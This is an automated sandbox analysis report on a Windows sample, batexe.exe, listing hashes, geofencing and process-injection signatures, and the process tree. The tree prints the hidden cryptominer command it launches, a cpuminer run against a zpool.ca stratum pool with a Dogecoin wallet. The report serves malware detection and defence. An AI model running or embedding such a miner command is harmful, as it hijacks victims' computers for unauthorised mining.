Analysis
-
max time kernel
293s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
23/02/2024, 14:22
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation b2e.exe Key value queried \REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation batexe.exe -
Executes dropped EXE 2 IoCs
pid Process 2808 b2e.exe 2624 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2624 cpuminer-sse2.exe 2624 cpuminer-sse2.exe 2624 cpuminer-sse2.exe 2624 cpuminer-sse2.exe 2624 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3400-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3400 wrote to memory of 2808 3400 batexe.exe 88 PID 3400 wrote to memory of 2808 3400 batexe.exe 88 PID 3400 wrote to memory of 2808 3400 batexe.exe 88 PID 2808 wrote to memory of 5036 2808 b2e.exe 89 PID 2808 wrote to memory of 5036 2808 b2e.exe 89 PID 2808 wrote to memory of 5036 2808 b2e.exe 89 PID 5036 wrote to memory of 2624 5036 cmd.exe 92 PID 5036 wrote to memory of 2624 5036 cmd.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5A45.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5DB0.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2624
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17.4MB
MD53d0111124c50a6c9c5bfe3e64bca0a0d
SHA16e1c794b3679d42b4d778802b37f6ce1761d2e82
SHA2561923937e3153960a0e408f1d8adc7e578bc41345d3b2e435b3139b91f22ba1f5
SHA51273cc473a341d52cfafe02f58803c8c0798d669bece3a471d79c2b423cb1c560a4638e0d222c94caedef23907421b4c4dc4248442d6b0c4c00aec14ea8b8ad512
-
Filesize
4.5MB
MD5277526cbcfa71c79c7206b15f4150d42
SHA10b427b8b7a84c060fdb2d0fd1d1783f49eabd9ab
SHA2568878e391361e408c314a00761345fa896d7c214cf77f67f72fffb6d4f921d778
SHA51205354ebdb24c5f0c8784b10747028826be28f1ac0a32e5b47c5c47db41468bdb08a6607db7e0509b4ce8761d9917126ebe8d460b9f86cddfa7bd61fea06a1a01
-
Filesize
4.5MB
MD5615b936eeb3e303ea3eaef8f20296111
SHA13329c1d65e8602807acf1d3e6ad5a6ffed386566
SHA2566cb35d8d3c2360a5e4e90d01c0e26aff4a039ef809afbb0f3d407821d8fdfbc6
SHA512002748ec3a9784d602b9236a0fbad5da88ddb77c033456e00a097b290df5d42a8e6b64ccd8db9ee9a6128160f6520df9bf3f50478818c3ad500dd46407b553d7
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
329KB
MD5eb1cee601141213b042fdd5f2275de07
SHA1c4b10b7f4f72e61bbd13aed779fd5b1dcf40a8e5
SHA2566b01d0910a4e09046c9ca655889b3e1188a4b60d0377e30818ad84ac3165ba34
SHA512a7ba1069889f7e0cdf8c3eb45eba03dd8a0f4ea3382a6604a30a92ae2b3fe332588e4bf500d00e4d507cde44b7d16b3e02cab95ec0ab7759db00256d506daaf7
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
192KB
MD58c933a591c8d0c1fec1da393587d09c9
SHA165f4672c0e0a6a20436fbaba57dac8c1a5fc5e51
SHA256c22ca427c0e65a0bb3e011afeba5244dd5a6e9c0327cfc7d15c4875083206b10
SHA51296b84267fd9b7c5587c74e30d5f647acabbf6b09feac19784de4e046619fcae78f2e6aa98eb7f06fe13197bfd9207b9044b09d5248480421ceb23cb01d511881
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
122KB
MD5a6dfd638fc2414e13bc49bafc8031b22
SHA1c145d42e54a3cde222ce71973124f87da092669c
SHA25656b4a5dda028c997bfdf464735d9e1b75621031c0b7153014077629af2004bfb
SHA512eefaad58190caf36d4c7a32635986b72951c760d9af0780168a700b76ffad27e399e05f851089b0604c66f5a9a168822db30bbfd9ebf19ea9cbf0cfc54aaac19
-
Filesize
150KB
MD586e475fd160aeb7902dd59adb0bfb408
SHA1ca294528f4e92c64f42cee1fd0903cd7e0e50268
SHA2565a4a9fb7fe84d7bdf8dcd71305cec678998f145c77e160009a670ddc050c5d6a
SHA512c465582295321802744c236ddb37a387044866f999af3c4e02edd90763e1b3ff3d84727df25c6905fe8220cf049a852bd9b8bd0cbf5bcef7adf58b1999654782
-
Filesize
59KB
MD536297ac53c43a288ed322fc0fef00285
SHA13f3ac35e0b67c62952b7c9a7e7ed8c46fc948b3e
SHA2563fb37d542eaf9aa5dc1fbe3ab6a592185da47ddab25ba9438f5efe73b6e6a479
SHA51241c745127786239ee1cfb61a61415951148fa30ac98fd454322632a10861a11ecd70d4fcd811d93b3d65d3e7a743e6def2550c925d2719b39d1d0ca1b5c71488
-
Filesize
64KB
MD5e98583e2f3157ea2561f40a91a79b195
SHA1770932f48dbea7a78a3b21e3df65e329a27313ff
SHA256f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2
SHA512cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
73KB
MD540e68ddd49b41e6a08c6bc57c88d1131
SHA1796a1b75d247ec08d8cc24130ab8214dfdb6c93e
SHA2562106bb64e5194e91e234f7b12bb7d09e965dd3b8bdb7bb0da7b936176574231f
SHA51203f8b7368ddbbfec9e657fa6a9f1e3cdc4582642bc88ad89c2865673b8dfab18962bd49d9a24f8414f9978822f28e64052fd841103195cf15584c2b399c73644